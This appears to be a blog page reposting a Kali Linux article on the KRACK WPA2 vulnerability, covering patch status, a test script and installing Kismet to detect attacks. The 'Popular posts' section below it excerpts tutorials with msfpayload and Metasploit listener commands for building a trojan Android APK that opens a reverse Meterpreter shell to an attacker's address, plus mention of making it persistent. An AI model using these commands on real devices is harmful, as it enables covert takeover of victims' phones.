Kali On KRACK

-

WPA2 Key Reinstallation AttaCK or KRACK attack

Recently, Mathy Vanhoef of imec-DistriNet, KU Leuven, discovered a serious weakness in WPA2 known as the Key Reinstallation AttaCK (or KRACK) attack. Their overview, Key Reinstallation Attacks: Breaking WPA2 by forcing nonce reuse, and research paper (Key Reinstallation Attacks: Forcing Nonce Reuse in WPA2, co-authored by Frank Piessens) have created quite a stir in our industry because the press touts that it “breaks Wi-Fi”.
There have been numerous articles written about this vulnerability, and we won’t rehash them here. However, we want to take a moment to talk about how this relates to Kali Linux, from a defensive, testing, and detection standpoint.

Is Kali Linux Vulnerable?

From a defensive standpoint, if you’re keeping up with your Kali Linux rolling updates (via a simple “apt update && apt upgrade), you’re already patched against this vulnerability thanks to patches in wpasupplicant and hostapd (both at 2.4-1.1). To be entirely clear: an updated version of Kali Linux is not vulnerable to this attack. You are keeping your Kali Linux system up-to-date, aren’t you?

How do I test for the Vulnerability?

With your Kali system updated, there are also some steps you can take to test for this vulnerability on your access points. Mathy Vanhoef recently released a script that can be run from Kali Linux to test whether or not your access point (AP) is affected by CVE-2017-13082 or specifically the Key Reinstall in FT Handshake vulnerability found in 802.11r devices. The script requires that you authenticate to the access point, but bear in mind that it may incorrectly flag an AP as vulnerable due to “benign retransmissions of data frames”.

How can I Detect Attacks?

Dragorn, the author of the amazing Kismet, has released lots of great information on the subject on his blog, including excellent info about detecting KRACK attacks using Kismet. He explains that the git-master version of Kismet is, “introducing alerts to attempt to detect a Krack-style attack”.
Kismet KRACK AlertThese alerts track spoofed access points, multichannel access points, zero-length keys, zero nonce in a handshake, and nonce retransmission, all factors that could point to a KRACK attack in progress.
Dragorn warns that since Kismet hops channels, it could miss handshake packets and therefore miss the attack. In addition, he says that false positives are still possible despite Kismet’s packet de-duplication and that once real proof-of-concept code is released for KRACK, the logic of these alerts may need to be adjusted.
Dragorn also explains that, “it looks like you can still trip the kismet nonce detection w/ a packet flagged in the frame control as a retransmit” but despite these drawbacks, Kismet is still a decent system for detection of this and other Wi-Fi protocol attacks.
Kismet Interface

To install the git-master version of Kismet on Kali Linux, follow these steps

First, tell networkmanager to ignore the Wi-Fi device by adding these lines:
[keyfile]
unmanaged-devices=interface-name:wlan0
to
/etc/NetworkManager/NetworkManager.conf
Then, restart NetworkManager:
root@kali:~# systemctl restart NetworkManager
Next, install updates and the git-master version of Kismet:
root@kali:~# apt update
root@kali:~# apt upgrade
root@kali:~# git clone https://www.kismetwireless.net/git/kismet.git
root@kali:~# apt install build-essential libmicrohttpd-dev libnl-3-dev libnl-genl-3-dev libcap-dev libpcap-dev libncurses5-dev libnm-dev libdw-dev libsqlite3-dev
root@kali:~# cd kismet
root@kali:~# ./configure
root@kali:~# make
root@kali:~# make suidinstall
root@kali:~# /usr/local/bin/kismet_capture_tools/kismet_cap_linux_wifi --list
root@kali:~# kismet -c wlan0
Next you can browse to http://localhost:2501 to view the Kismet interface and any alerts. Be sure to log in with the credentials found in
~/.kismet/kismet_httpd.conf
to get full functionality. You can also build and run the capture tools on separate machines, allowing you to monitor from several endpoints and view the alerts on a single centralized server.
Overall, this vulnerability is not the end of the world. As @grifter801 puts it, this vulnerability encourages this shocking approach: “Patch your stuff. Use 2FA. Use HTTPS.” We couldn’t agree more.
We also encourage you to consider the defensive, testing, and detection perspectives of any new vulnerability to help you become more aware of the finer details of the vulnerability, gain insight about it, and become part of the solution.
Thanks to Offensive Security and Kali team member Steev for the technical resources used in this article.

Comments

Post a Comment

Popular posts from this blog

How To Create A Persistent BackDoor In Android Using Kali Linux

-
Image
How to make the Backdoor Persistent: In this tutorial I am going to show you how to make the back door we created in my guide here a persistent one. I finally found out a way to do this, as I was/am very poor in bash scripting, I took much time (20hrs approx.) to get the script working and executable, thanks to the raw syntaxes I found out from other sites. Step 1   Fire Up Kali and Hack an Android System: Use this guide to hack an android system on LAN. I'll be hacking on WAN Lets Create a backdoor by typing: msfpayload android/meterpreter/reverse_tcp LHOST=182.68.42.6 R > /root/abcde.apk Now, lets set-up a Listener: msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 192.168.0.4 exploit     After the User/Victim Installs and opens the abcde.apk, Meterpreter Comes Up...   Step 2   Create a Persistent Script: Here.. Copy these comma...
Read more

How To Hack Android With Kali Linux

-
Image
  Step 1   Fire-Up Kali: Open a terminal, and make a Trojan .apk You can do this by typing : msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP) You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section) Note: Replace msfpayload with msfvenom...... Step 2   Open Another Terminal: Open another terminal until the file is being produced. Load metasploit console, by typing : msfconsole Step 3   Set-Up a Listener: After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal ...
Read more

How To Setup A Raspberry Pi Hacking Machine

-
Image
Set Up a Headless Raspberry Pi Hacking Platform Running Kali Linux The Raspberry Pi 3 Motherboard (made in UK) is a credit card-sized computer that can crack Wi-Fi, clone key cards, break into laptops, and even clone an existing Wi-Fi network to trick users into connecting to the Pi instead. It can jam Wi-Fi for blocks, track cell phones, listen in on police scanners, broadcast an FM radio signal. The key to this power is a massive community of developers and builders who contribute thousands of builds for the Kali Linux and Raspberry Pi platforms. For less than a tank of gas, a Raspberry Pi 3 buys you a low-cost, flexible cyberweapon. Of course, it's important to compartmentalize your hacking and avoid using systems that uniquely identify you, like customized hardware. Not everyone has access to a supercomputer or gaming tower, but fortunately one is not needed to have a solid Kali Linux platform. With over 10 million units sold, t...
Read more